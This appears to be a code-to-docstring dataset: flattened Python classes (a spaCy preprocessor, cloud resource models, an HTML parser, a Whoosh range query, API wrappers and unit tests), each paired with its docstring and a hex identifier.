class WordNetSpacyPreprocessor: <NEW_LINE> <INDENT> def __init__(self, whitespace_tokenize_only: bool = False): <NEW_LINE> <INDENT> self.nlp = spacy.load('en_core_web_sm', disable=['tagger', 'parser', 'ner', 'textcat']) <NEW_LINE> if whitespace_tokenize_only: <NEW_LINE> <INDENT> self.nlp.tokenizer = WhitespaceTokenizer(self.nlp.vocab) <NEW_LINE> <DEDENT> self.spacy_to_wordnet_map = { 'PROPN': 'NOUN' } <NEW_LINE> <DEDENT> def __call__(self, text: str) -> List[Token]: <NEW_LINE> <INDENT> spacy_doc = self.nlp(text) <NEW_LINE> normalized_tokens = [ Token(spacy_token.text, pos_=self.spacy_to_wordnet_map.get(spacy_token.pos_, spacy_token.pos_), lemma_=spacy_token.lemma_ ) for spacy_token in spacy_doc if not spacy_token.is_space ] <NEW_LINE> return normalized_tokens
A "preprocessor" that really does POS tagging and lemmatization using spacy, plus some hand crafted rules. allennlp tokenizers take strings and return lists of Token classes. we'll run spacy first, then modify the POS / lemmas as needed, then return a new list of Token
62599068627d3e7fe0e08632
class ChannelReference(DataType): <NEW_LINE> <INDENT> def __init__(self, value, description="", units=""): <NEW_LINE> <INDENT> super(ChannelReference, self).__init__(value, description, units) <NEW_LINE> self._channel_name = value <NEW_LINE> <DEDENT> @property <NEW_LINE> def value(self): <NEW_LINE> <INDENT> return _DefaultGatewayFactory.get_workspace2().get_single_channel_value(self._channel_name) <NEW_LINE> <DEDENT> @value.setter <NEW_LINE> def value(self, newvalue): <NEW_LINE> <INDENT> _DefaultGatewayFactory.get_workspace2().set_single_channel_value(self._channel_name, newvalue) <NEW_LINE> <DEDENT> def _to_data_value(self, value): <NEW_LINE> <INDENT> return ClientApiDoubleValue(value)
Creates a new scalar channel reference. Creates a new reference to a scalar channel and specifies which channel assignment to map the new channel reference to. You can specify a channel by its alias or by the path to the channel in the system definition. For example: Targets/Controller/System Channels/Model Count.
625990687d43ff2487427fe5
class Instance(object): <NEW_LINE> <INDENT> def __init__(self, **kwargs): <NEW_LINE> <INDENT> self.can_ip_forward = kwargs.get('can_ip_forward') <NEW_LINE> self.cpu_platform = kwargs.get('cpu_platform') <NEW_LINE> self.creation_timestamp = kwargs.get('creation_timestamp') <NEW_LINE> self.description = kwargs.get('description') <NEW_LINE> self.disks = parser.json_unstringify(kwargs.get('disks')) <NEW_LINE> self.machine_type = kwargs.get('machine_type') <NEW_LINE> self.metadata = parser.json_unstringify(kwargs.get('metadata')) <NEW_LINE> self.name = kwargs.get('name') <NEW_LINE> self.network_interfaces = parser.json_unstringify( kwargs.get('network_interfaces')) <NEW_LINE> self.project_id = kwargs.get('project_id') <NEW_LINE> self.resource_id = kwargs.get('id') <NEW_LINE> self.scheduling = parser.json_unstringify(kwargs.get('scheduling')) <NEW_LINE> self.service_accounts = parser.json_unstringify( kwargs.get('service_accounts')) <NEW_LINE> self.status = kwargs.get('status') <NEW_LINE> self.status_message = kwargs.get('status_message') <NEW_LINE> self.tags = parser.json_unstringify(kwargs.get('tags')) <NEW_LINE> self.zone = kwargs.get('zone') <NEW_LINE> <DEDENT> @property <NEW_LINE> def key(self): <NEW_LINE> <INDENT> return Key.from_args(self.project_id, self.zone, self.name) <NEW_LINE> <DEDENT> def create_network_interfaces(self): <NEW_LINE> <INDENT> return [InstanceNetworkInterface(**ni) for ni in self.network_interfaces]
Represents Instance resource.
62599068435de62698e9d5b3
class MyHTMLParser(HTMLParser): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.level = 0 <NEW_LINE> self.level_array = [] <NEW_LINE> self.triggered = False <NEW_LINE> self.news_results = [] <NEW_LINE> <DEDENT> def handle_starttag(self, tag, attrs): <NEW_LINE> <INDENT> if tag == "script" or tag == "style": <NEW_LINE> <INDENT> key = 0 <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> key = 1 <NEW_LINE> <DEDENT> if self.level >= len(self.level_array): <NEW_LINE> <INDENT> self.level_array.append(key) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> self.level_array[self.level] = key <NEW_LINE> <DEDENT> self.level = self.level+1 <NEW_LINE> <DEDENT> def handle_endtag(self, tag): <NEW_LINE> <INDENT> self.level = self.level-1 <NEW_LINE> <DEDENT> def handle_data(self, data): <NEW_LINE> <INDENT> if self.level_array[self.level-1] == 1: <NEW_LINE> <INDENT> if self.triggered is True: <NEW_LINE> <INDENT> self.news_results.append(data) <NEW_LINE> <DEDENT> elif data == "Press Releases": <NEW_LINE> <INDENT> self.triggered = True <NEW_LINE> <DEDENT> <DEDENT> <DEDENT> def error(self, message): <NEW_LINE> <INDENT> print("Encountered an error ", message) <NEW_LINE> <DEDENT> def get_raw_news(self): <NEW_LINE> <INDENT> return self.news_results
Custom HTML parser
625990684e4d562566373bb0
class TestMediator(IMediator): <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.q = Queue() <NEW_LINE> self.q.put(Marker('ABBA - Money Money Money', 0.0)) <NEW_LINE> self.q.put(Marker('John Travolta - Summer Lovin', 2.01)) <NEW_LINE> self.q.put(Marker('Imperial Leisure - Man On The Street', 3.84)) <NEW_LINE> self.q.put(Marker('Zammuto - Need Some Sun', 6.23)) <NEW_LINE> self.q.put(Marker('3typen - Pretty Little Thing', 7.98)) <NEW_LINE> self.q.put(Marker('The Darkness - Forbidden Love', 9.59)) <NEW_LINE> self.q.put(Marker('Justice - Fire', 13.01)) <NEW_LINE> self.q.listen = partial(self.listen, self.q) <NEW_LINE> <DEDENT> def subscribe(self, event_types: list): <NEW_LINE> <INDENT> return self.q <NEW_LINE> <DEDENT> def listen(self, q: Queue, block=True, timeout=5): <NEW_LINE> <INDENT> sleep(2) <NEW_LINE> yield q.get(block=block, timeout=timeout)
Mediator to test AudacityLabels.
62599068ac7a0e7691f73c8f
class Meta: <NEW_LINE> <INDENT> ordering = ["-id"]
Metadata class.
625990681b99ca400229010a
class Classify: <NEW_LINE> <INDENT> def __init__(self): <NEW_LINE> <INDENT> self.classification = None <NEW_LINE> self.confusion = None <NEW_LINE> self.data = None <NEW_LINE> self._log_loss = None <NEW_LINE> self.model = None <NEW_LINE> self.predict = None <NEW_LINE> self._score = None <NEW_LINE> self.x_train = None <NEW_LINE> self.x_test = None <NEW_LINE> self.y_train = None <NEW_LINE> self.y_test = None <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return 'Classify()' <NEW_LINE> <DEDENT> @property <NEW_LINE> def log_loss(self): <NEW_LINE> <INDENT> return f'Log Loss: {self._log_loss:.3f}' <NEW_LINE> <DEDENT> @property <NEW_LINE> def score(self): <NEW_LINE> <INDENT> return f'Model Score: {self._score:.3f}' <NEW_LINE> <DEDENT> def accuracy_vs_k(self, max_k=20, save=False): <NEW_LINE> <INDENT> accuracy = {} <NEW_LINE> for n in range(1, max_k, 1): <NEW_LINE> <INDENT> self.classify_data(model='KNN', n=n) <NEW_LINE> accuracy[n] = self._score <NEW_LINE> <DEDENT> fig = plt.figure('KNN Accuracy vs K', figsize=(8, 6), facecolor='white', edgecolor='black') <NEW_LINE> rows, cols = (1, 1) <NEW_LINE> ax0 = plt.subplot2grid((rows, cols), (0, 0)) <NEW_LINE> result = pd.Series(accuracy) <NEW_LINE> result.plot(ax=ax0) <NEW_LINE> ax0.set_title('Accuracy vs Nearest Neighbors Quantity', fontsize=size['title']) <NEW_LINE> ax0.set_xlabel('Nearest Neighbors Quantity $K$', fontsize=size['label']) <NEW_LINE> ax0.set_ylabel('Accuracy', fontsize=size['label']) <NEW_LINE> ax0.yaxis.set_major_formatter(ax_formatter['percent']) <NEW_LINE> save_fig('accuracy_vs_k', save) <NEW_LINE> <DEDENT> def classify_data(self, model='LR', n=1): <NEW_LINE> <INDENT> models = { 'KNN': sklearn.neighbors.KNeighborsClassifier(n_neighbors=n), 'LDA': LinearDiscriminantAnalysis(), 'LR': LogisticRegression(), 'NB': GaussianNB(), 'QDA': QuadraticDiscriminantAnalysis(), } <NEW_LINE> if model not in models.keys(): <NEW_LINE> <INDENT> logging.error(f'Requested model {model} has not been implemented.') <NEW_LINE> <DEDENT> self.model = (models[model] .fit(self.x_train, self.y_train)) <NEW_LINE> self.predict = self.model.predict(self.x_test) <NEW_LINE> self.confusion = pd.DataFrame(confusion_matrix(self.y_test, self.predict)) <NEW_LINE> self.classification = classification_report(self.y_test, self.predict) <NEW_LINE> self._log_loss = log_loss(self.y_test, self.model.predict_proba(self.x_test)) <NEW_LINE> self._score = self.model.score(self.x_test, self.y_test)
Base class for classification. :Attributes: - **classification** *str* classification report - **confusion** *DataFrame* confusion matrix - **data**: *DataFrame* data - **log_loss**: *float* cross-entropy loss - **model**: classification model type - **predict**: *ndarray* model predicted values - **x_train**: *DataFrame* training features - **y_train**: *Series* training response - **x_test**: *DataFrame* testing features - **y_test**: *Series* testing response
625990687c178a314d78e7c0
class NumericRange(RangeMixin, qcore.Query): <NEW_LINE> <INDENT> def __init__(self, fieldname, start, end, startexcl=False, endexcl=False, boost=1.0, constantscore=True): <NEW_LINE> <INDENT> self.fieldname = fieldname <NEW_LINE> self.start = start <NEW_LINE> self.end = end <NEW_LINE> self.startexcl = startexcl <NEW_LINE> self.endexcl = endexcl <NEW_LINE> self.boost = boost <NEW_LINE> self.constantscore = constantscore <NEW_LINE> <DEDENT> def simplify(self, ixreader): <NEW_LINE> <INDENT> return self._compile_query(ixreader).simplify(ixreader) <NEW_LINE> <DEDENT> def estimate_size(self, ixreader): <NEW_LINE> <INDENT> return self._compile_query(ixreader).estimate_size(ixreader) <NEW_LINE> <DEDENT> def estimate_min_size(self, ixreader): <NEW_LINE> <INDENT> return self._compile_query(ixreader).estimate_min_size(ixreader) <NEW_LINE> <DEDENT> def docs(self, searcher): <NEW_LINE> <INDENT> q = self._compile_query(searcher.reader()) <NEW_LINE> return q.docs(searcher) <NEW_LINE> <DEDENT> def _compile_query(self, ixreader): <NEW_LINE> <INDENT> from whoosh.fields import NUMERIC <NEW_LINE> from whoosh.support.numeric import tiered_ranges <NEW_LINE> field = ixreader.schema[self.fieldname] <NEW_LINE> if not isinstance(field, NUMERIC): <NEW_LINE> <INDENT> raise Exception("NumericRange: field %r is not numeric" % self.fieldname) <NEW_LINE> <DEDENT> start = field.prepare_number(self.start) <NEW_LINE> end = field.prepare_number(self.end) <NEW_LINE> subqueries = [] <NEW_LINE> for starttext, endtext in tiered_ranges(field.type, field.signed, start, end, field.shift_step, self.startexcl, self.endexcl): <NEW_LINE> <INDENT> if starttext == endtext: <NEW_LINE> <INDENT> subq = terms.Term(self.fieldname, starttext) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> subq = TermRange(self.fieldname, starttext, endtext) <NEW_LINE> <DEDENT> subqueries.append(subq) <NEW_LINE> <DEDENT> if len(subqueries) == 1: <NEW_LINE> <INDENT> q = subqueries[0] <NEW_LINE> <DEDENT> elif subqueries: <NEW_LINE> <INDENT> q = nary.Or(subqueries, boost=self.boost) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return qcore.NullQuery <NEW_LINE> <DEDENT> if self.constantscore: <NEW_LINE> <INDENT> q = wrappers.ConstantScoreQuery(q, self.boost) <NEW_LINE> <DEDENT> return q <NEW_LINE> <DEDENT> def matcher(self, searcher, weighting=None): <NEW_LINE> <INDENT> q = self._compile_query(searcher.reader()) <NEW_LINE> return q.matcher(searcher, weighting=weighting)
A range query for NUMERIC fields. Takes advantage of tiered indexing to speed up large ranges by matching at a high resolution at the edges of the range and a low resolution in the middle. >>> # Match numbers from 10 to 5925 in the "number" field. >>> nr = NumericRange("number", 10, 5925)
625990687b25080760ed88b6
class NumpyDataset(ArrayDataset): <NEW_LINE> <INDENT> def __init__(self, filename): <NEW_LINE> <INDENT> arrs = np.load(filename) <NEW_LINE> keys = None <NEW_LINE> data = [] <NEW_LINE> if filename.endswith('.npy'): <NEW_LINE> <INDENT> data.append(arrs) <NEW_LINE> <DEDENT> elif filename.endswith('.npz'): <NEW_LINE> <INDENT> keys = sorted(arrs.keys()) <NEW_LINE> for key in keys: <NEW_LINE> <INDENT> data.append(arrs[key]) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> raise ValueError('Unsupported extension: %s'%filename) <NEW_LINE> <DEDENT> self._keys = keys <NEW_LINE> super(NumpyDataset, self).__init__(*data) <NEW_LINE> <DEDENT> @property <NEW_LINE> def keys(self): <NEW_LINE> <INDENT> return self._keys
A dataset wrapping over a Numpy binary (.npy, .npz) file. If the file is a .npy file, then a single numpy array is loaded. If the file is a .npz file with multiple arrays, then a list of numpy arrays are loaded, ordered by their key in the archive. Sparse matrix is not yet supported. Parameters ---------- filename : str Path to the .npy or .npz file. Properties ---------- keys: list of str or None The list of keys loaded from the .npz file.
6259906892d797404e389732
class XVType(FrozenClass): <NEW_LINE> <INDENT> def __init__(self, binary=None): <NEW_LINE> <INDENT> if binary is not None: <NEW_LINE> <INDENT> self._binary_init(binary) <NEW_LINE> self._freeze = True <NEW_LINE> return <NEW_LINE> <DEDENT> self.X = 0 <NEW_LINE> self.Value = 0 <NEW_LINE> self._freeze = True <NEW_LINE> <DEDENT> def to_binary(self): <NEW_LINE> <INDENT> packet = [] <NEW_LINE> packet.append(uatype_Double.pack(self.X)) <NEW_LINE> packet.append(uatype_Float.pack(self.Value)) <NEW_LINE> return b''.join(packet) <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def from_binary(data): <NEW_LINE> <INDENT> return XVType(data) <NEW_LINE> <DEDENT> def _binary_init(self, data): <NEW_LINE> <INDENT> self.X = uatype_Double.unpack(data.read(8))[0] <NEW_LINE> self.Value = uatype_Float.unpack(data.read(4))[0] <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return 'XVType(' + 'X:' + str(self.X) + ', ' + 'Value:' + str(self.Value) + ')' <NEW_LINE> <DEDENT> __repr__ = __str__
:ivar X: :vartype X: Double :ivar Value: :vartype Value: Float
62599068a17c0f6771d5d77c
class TFETeams(TFEEndpoint): <NEW_LINE> <INDENT> def __init__(self, base_url, organization_name, headers): <NEW_LINE> <INDENT> super().__init__(base_url, organization_name, headers) <NEW_LINE> self._teams_base_url = f"{base_url}/teams" <NEW_LINE> self._org_base_url = f"{base_url}/organizations/{organization_name}/teams" <NEW_LINE> <DEDENT> def create(self, payload): <NEW_LINE> <INDENT> return self._create(self._org_base_url, payload) <NEW_LINE> <DEDENT> def destroy(self, team_id): <NEW_LINE> <INDENT> url = f"{self._teams_base_url}/{team_id}" <NEW_LINE> return self._destroy(url) <NEW_LINE> <DEDENT> def lst(self): <NEW_LINE> <INDENT> return self._ls(self._org_base_url) <NEW_LINE> <DEDENT> def show(self, team_id): <NEW_LINE> <INDENT> url = f"{self._teams_base_url}/{team_id}" <NEW_LINE> return self._show(url)
The Teams API is used to create, edit, and destroy teams as well as manage a team's organization-level permissions. The Team Membership API is used to add or remove users from a team. Use the Team Access API to associate a team with privileges on an individual workspace. https://www.terraform.io/docs/enterprise/api/teams.html
625990686e29344779b01dfb
class S3Parser(object): <NEW_LINE> <INDENT> @staticmethod <NEW_LINE> def parse_rss(message): <NEW_LINE> <INDENT> db = current.db <NEW_LINE> s3db = current.s3db <NEW_LINE> table = s3db.msg_rss <NEW_LINE> record = db(table.message_id == message.message_id).select(table.title, table.from_address, table.body, table.created_on, table.tags, table.author, limitby=(0, 1) ).first() <NEW_LINE> if not record: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> body = record.body or record.title <NEW_LINE> author = record.author <NEW_LINE> if author: <NEW_LINE> <INDENT> ptable = s3db.pr_person <NEW_LINE> from nameparser import HumanName <NEW_LINE> name = HumanName(author) <NEW_LINE> first_name = name.first <NEW_LINE> middle_name = name.middle <NEW_LINE> last_name = name.last <NEW_LINE> query = (ptable.first_name == first_name) & (ptable.middle_name == middle_name) & (ptable.last_name == last_name) <NEW_LINE> exists = db(query).select(ptable.id, limitby=(0, 1) ).first() <NEW_LINE> if exists: <NEW_LINE> <INDENT> person_id = exists.id <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> person_id = ptable.insert(first_name = first_name, middle_name = middle_name, last_name = last_name) <NEW_LINE> <DEDENT> <DEDENT> else: <NEW_LINE> <INDENT> person_id = None <NEW_LINE> <DEDENT> tags = record.tags <NEW_LINE> url = record.from_address <NEW_LINE> table = s3db.cms_series <NEW_LINE> series_id = db(table.name == "News").select(table.id, limitby=(0, 1) ).first().id <NEW_LINE> table = db.cms_post <NEW_LINE> post_id = table.insert(title = record.title, body = body, created_on = record.created_on, person_id = person_id, series_id = series_id, ) <NEW_LINE> record = dict(id=post_id) <NEW_LINE> s3db.update_super(table, record) <NEW_LINE> if url: <NEW_LINE> <INDENT> s3db.doc_document.insert(doc_id = record["doc_id"], url = url, ) <NEW_LINE> <DEDENT> if tags: <NEW_LINE> <INDENT> ttable = db.cms_tag <NEW_LINE> ltable = db.cms_tag_post <NEW_LINE> for t in tags: <NEW_LINE> <INDENT> tag = db(ttable.name == t).select(ttable.id, limitby=(0, 1), ).first() <NEW_LINE> if tag: <NEW_LINE> <INDENT> tag_id = tag.id <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> tag_id = ttable.insert(name = t) <NEW_LINE> <DEDENT> ltable.insert(post_id = post_id, tag_id = tag_id, ) <NEW_LINE> <DEDENT> <DEDENT> return
Message Parsing Template.
62599068460517430c432c2a
class MatRead(object): <NEW_LINE> <INDENT> def __init__(self, temp_dir=None): <NEW_LINE> <INDENT> self.temp_dir = temp_dir <NEW_LINE> self.out_file = create_file(self.temp_dir) <NEW_LINE> <DEDENT> def setup(self, nout, names=None): <NEW_LINE> <INDENT> argout_list = [] <NEW_LINE> for i in range(nout): <NEW_LINE> <INDENT> if names: <NEW_LINE> <INDENT> argout_list.append(names.pop(0)) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> argout_list.append("%s__" % chr(i + 97)) <NEW_LINE> <DEDENT> <DEDENT> save_line = 'save -v6 {0} {1}'.format(self.out_file, ' '.join(argout_list)) <NEW_LINE> return argout_list, save_line <NEW_LINE> <DEDENT> def remove_file(self): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> os.remove(self.out_file) <NEW_LINE> <DEDENT> except (OSError, AttributeError): <NEW_LINE> <INDENT> pass <NEW_LINE> <DEDENT> <DEDENT> def extract_file(self, variables=None): <NEW_LINE> <INDENT> try: <NEW_LINE> <INDENT> data = loadmat(self.out_file) <NEW_LINE> <DEDENT> except UnicodeDecodeError as e: <NEW_LINE> <INDENT> raise Oct2PyError(str(e)) <NEW_LINE> <DEDENT> for key in list(data.keys()): <NEW_LINE> <INDENT> if key.startswith('_') and not key == '_': <NEW_LINE> <INDENT> del data[key] <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> data[key] = get_data(data[key]) <NEW_LINE> <DEDENT> <DEDENT> if len(data) == 1: <NEW_LINE> <INDENT> return list(data.values())[0] <NEW_LINE> <DEDENT> elif data: <NEW_LINE> <INDENT> return data
Read Python values from a MAT file made by Octave. Strives to preserve both value and type in transit.
62599068e1aae11d1e7cf3e1
class ComparisonFrame(awx.Frame): <NEW_LINE> <INDENT> def __init__(self, parent, dirpaths=None, filepaths=None, wildcard=None, **kwargs): <NEW_LINE> <INDENT> super(ComparisonFrame, self).__init__(parent, -1, **kwargs) <NEW_LINE> main_sizer = wx.BoxSizer(wx.VERTICAL) <NEW_LINE> hsizer = wx.BoxSizer(wx.HORIZONTAL) <NEW_LINE> st1 = wx.StaticText(self, -1, "Quantity:", wx.DefaultPosition, wx.DefaultSize, 0) <NEW_LINE> st1.Wrap(-1) <NEW_LINE> hsizer.Add(st1, 0, wx.ALIGN_CENTER_VERTICAL | wx.TOP | wx.BOTTOM | wx.LEFT, 5) <NEW_LINE> plotter_choices = ["ebands", "edos", "mdf", "sigres"] <NEW_LINE> self.plotter_cbox = wx.ComboBox(self, -1, "ebands", wx.DefaultPosition, wx.DefaultSize, plotter_choices, 0) <NEW_LINE> hsizer.Add(self.plotter_cbox, 0, wx.ALL, 5) <NEW_LINE> compare_button = wx.Button(self, -1, "Compare", wx.DefaultPosition, wx.DefaultSize, 0) <NEW_LINE> compare_button.Bind(wx.EVT_BUTTON, self.OnCompareButton) <NEW_LINE> hsizer.Add(compare_button, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 5) <NEW_LINE> main_sizer.Add(hsizer, 0, wx.ALIGN_CENTER_HORIZONTAL, 5) <NEW_LINE> self.panel = FileCheckBoxPanel(self, filepaths) <NEW_LINE> main_sizer.Add(self.panel, 1, wx.EXPAND, 5) <NEW_LINE> self.SetSizerAndFit(main_sizer) <NEW_LINE> <DEDENT> def OnCompareButton(self, event): <NEW_LINE> <INDENT> selected_files = self.panel.GetSelectedFilepaths() <NEW_LINE> choice = self.plotter_cbox.GetValue() <NEW_LINE> try: <NEW_LINE> <INDENT> if choice == "ebands": <NEW_LINE> <INDENT> plotter = ElectronBandsPlotter() <NEW_LINE> for filepath in selected_files: <NEW_LINE> <INDENT> plotter.add_ebands_from_file(filepath) <NEW_LINE> <DEDENT> plotter.plot() <NEW_LINE> <DEDENT> elif choice == "edos": <NEW_LINE> <INDENT> dos_dialog = ElectronDosDialog(None) <NEW_LINE> if dos_dialog.ShowModal() == wx.ID_OK: <NEW_LINE> <INDENT> p = dos_dialog.GetParams() <NEW_LINE> plotter = ElectronDosPlotter() <NEW_LINE> for filepath in selected_files: <NEW_LINE> <INDENT> plotter.add_edos_from_file(filepath, **p) <NEW_LINE> <DEDENT> plotter.plot() <NEW_LINE> <DEDENT> dos_dialog.Destroy() <NEW_LINE> <DEDENT> elif choice == "mdf": <NEW_LINE> <INDENT> plotter = MdfPlotter() <NEW_LINE> for filepath in selected_files: <NEW_LINE> <INDENT> plotter.add_mdf_from_file(filepath, mdf_type="exc") <NEW_LINE> <DEDENT> plotter.plot() <NEW_LINE> <DEDENT> elif choice == "sigres": <NEW_LINE> <INDENT> plotter = SigresPlotter() <NEW_LINE> plotter.add_files(selected_files) <NEW_LINE> plotter.plot_qpgaps() <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> awx.showErrorMessage(self, message="No function registered for choice %s" % choice) <NEW_LINE> <DEDENT> <DEDENT> except Exception: <NEW_LINE> <INDENT> awx.showErrorMessage(self)
This frame allows the user to select/deselect a list of files and to produce plots for all the files selected. Useful for convergence studies.
62599068097d151d1a2c2817
class NodePool(_messages.Message): <NEW_LINE> <INDENT> class StatusValueValuesEnum(_messages.Enum): <NEW_LINE> <INDENT> STATUS_UNSPECIFIED = 0 <NEW_LINE> PROVISIONING = 1 <NEW_LINE> RUNNING = 2 <NEW_LINE> RUNNING_WITH_ERROR = 3 <NEW_LINE> RECONCILING = 4 <NEW_LINE> STOPPING = 5 <NEW_LINE> ERROR = 6 <NEW_LINE> <DEDENT> autoscaling = _messages.MessageField('NodePoolAutoscaling', 1) <NEW_LINE> conditions = _messages.MessageField('StatusCondition', 2, repeated=True) <NEW_LINE> config = _messages.MessageField('NodeConfig', 3) <NEW_LINE> initialNodeCount = _messages.IntegerField(4, variant=_messages.Variant.INT32) <NEW_LINE> instanceGroupUrls = _messages.StringField(5, repeated=True) <NEW_LINE> management = _messages.MessageField('NodeManagement', 6) <NEW_LINE> name = _messages.StringField(7) <NEW_LINE> selfLink = _messages.StringField(8) <NEW_LINE> status = _messages.EnumField('StatusValueValuesEnum', 9) <NEW_LINE> statusMessage = _messages.StringField(10) <NEW_LINE> version = _messages.StringField(11)
NodePool contains the name and configuration for a cluster's node pool. Node pools are a set of nodes (i.e. VM's), with a common configuration and specification, under the control of the cluster master. They may have a set of Kubernetes labels applied to them, which may be used to reference them during pod scheduling. They may also be resized up or down, to accommodate the workload. Enums: StatusValueValuesEnum: [Output only] The status of the nodes in this pool instance. Fields: autoscaling: Autoscaler configuration for this NodePool. Autoscaler is enabled only if a valid configuration is present. conditions: Which conditions caused the current node pool state. config: The node configuration of the pool. initialNodeCount: The initial node count for the pool. You must ensure that your Compute Engine <a href="/compute/docs/resource- quotas">resource quota</a> is sufficient for this number of instances. You must also have available firewall and routes quota. instanceGroupUrls: [Output only] The resource URLs of the [managed instance groups](/compute/docs/instance-groups/creating-groups-of- managed-instances) associated with this node pool. management: NodeManagement configuration for this NodePool. name: The name of the node pool. selfLink: [Output only] Server-defined URL for the resource. status: [Output only] The status of the nodes in this pool instance. statusMessage: [Output only] Additional information about the current status of this node pool instance, if available. version: The version of the Kubernetes of this node.
625990687047854f46340b5e
class Poll(db.Model): <NEW_LINE> <INDENT> title = db.StringProperty() <NEW_LINE> n_problems = db.IntegerProperty() <NEW_LINE> problem_titles = db.StringListProperty() <NEW_LINE> votes = db.ListProperty(int) <NEW_LINE> created = db.DateTimeProperty(auto_now_add=True)
Models an individual Guestbook entry with author, content, and date.
62599068cc40096d6161adb5
class TestFrameGetStateConfirmation(unittest.TestCase): <NEW_LINE> <INDENT> EXAMPLE_FRAME = b"\x00\t\x00\r\x03\x80\x00\x00\x00\x00\x87" <NEW_LINE> def test_bytes(self): <NEW_LINE> <INDENT> frame = FrameGetStateConfirmation() <NEW_LINE> frame.gateway_state = GatewayState.BEACON_MODE_NOT_CONFIGURED <NEW_LINE> frame.gateway_sub_state = GatewaySubState.PERFORMING_TASK_COMMAND <NEW_LINE> self.assertEqual(bytes(frame), self.EXAMPLE_FRAME) <NEW_LINE> <DEDENT> def test_frame_from_raw(self): <NEW_LINE> <INDENT> frame = frame_from_raw(self.EXAMPLE_FRAME) <NEW_LINE> self.assertTrue(isinstance(frame, FrameGetStateConfirmation)) <NEW_LINE> self.assertEqual(frame.gateway_state, GatewayState.BEACON_MODE_NOT_CONFIGURED) <NEW_LINE> self.assertEqual( frame.gateway_sub_state, GatewaySubState.PERFORMING_TASK_COMMAND ) <NEW_LINE> <DEDENT> def test_str(self): <NEW_LINE> <INDENT> frame = FrameGetStateConfirmation() <NEW_LINE> frame.gateway_state = GatewayState.BEACON_MODE_NOT_CONFIGURED <NEW_LINE> frame.gateway_sub_state = GatewaySubState.PERFORMING_TASK_COMMAND <NEW_LINE> self.assertEqual( str(frame), "<FrameGetStateConfirmation " 'gateway_state="GatewayState.BEACON_MODE_NOT_CONFIGURED" ' 'gateway_sub_state="GatewaySubState.PERFORMING_TASK_COMMAND"/>', )
Test class FrameGetStateConfirmation.
62599068462c4b4f79dbd1b1
class PdfFile: <NEW_LINE> <INDENT> def __init__(self, filename: str, binary: bytes): <NEW_LINE> <INDENT> super().__init__() <NEW_LINE> self.filename = filename <NEW_LINE> self.binary = binary <NEW_LINE> <DEDENT> @staticmethod <NEW_LINE> def from_file(file): <NEW_LINE> <INDENT> return PdfFile(filename=os.path.basename(file), binary=file_to_bytes(file)) <NEW_LINE> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> return "PdfFile: {}, {:.2f} MB".format(self.filename, len(self.binary) / MB) <NEW_LINE> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return self.__str__()
a wrapper for a PDF file. Consists of the file name and the binary contents of the file.
625990683539df3088ecda49
class BrowserHandler(BaseHandler): <NEW_LINE> <INDENT> def get(self): <NEW_LINE> <INDENT> loader = tornado.template.Loader('../server/templates') <NEW_LINE> try: <NEW_LINE> <INDENT> n = self.get_argument('n') <NEW_LINE> <DEDENT> except: <NEW_LINE> <INDENT> n = 3 <NEW_LINE> <DEDENT> db = self.settings['db'] <NEW_LINE> logging.debug('hit the BrowserHandler endpoint with n=', n) <NEW_LINE> keywords = [] <NEW_LINE> found = 0 <NEW_LINE> while found < int(n): <NEW_LINE> <INDENT> k = db.randomkey() <NEW_LINE> if k not in keywords: <NEW_LINE> <INDENT> keywords.append(k) <NEW_LINE> found += 1 <NEW_LINE> <DEDENT> <DEDENT> self.write(loader.load("rf_main.html").generate(keywords=keywords)) <NEW_LINE> self.finish()
HTML display of rf-immanence data browsed in the last day
6259906832920d7e50bc77f0
class DictionariesResource(Resource): <NEW_LINE> <INDENT> schema = { 'name': { 'type': 'string', 'required': True }, 'language_id': { 'type': 'string', 'required': True }, 'content': { 'type': 'dict', }, 'content_list': { 'type': 'string', }, DICTIONARY_FILE: { 'type': 'file', }, 'user': Resource.rel('users', nullable=True), 'is_active': { 'type': 'string', 'default': 'true', }, 'type': { 'type': 'string', 'default': DictionaryType.DICTIONARY.value, 'allowed': DictionaryType.values() }, '_file_id': {'type': 'objectid', 'nullable': True, 'readonly': True}, } <NEW_LINE> item_methods = ['GET', 'PATCH', 'PUT', 'DELETE'] <NEW_LINE> resource_methods = ['GET', 'POST', 'DELETE'] <NEW_LINE> privileges = {'POST': 'dictionaries', 'PATCH': 'dictionaries', 'DELETE': 'dictionaries'} <NEW_LINE> etag_ignore_fields = ['content', 'content_list']
Dictionaries schema
6259906832920d7e50bc77f1
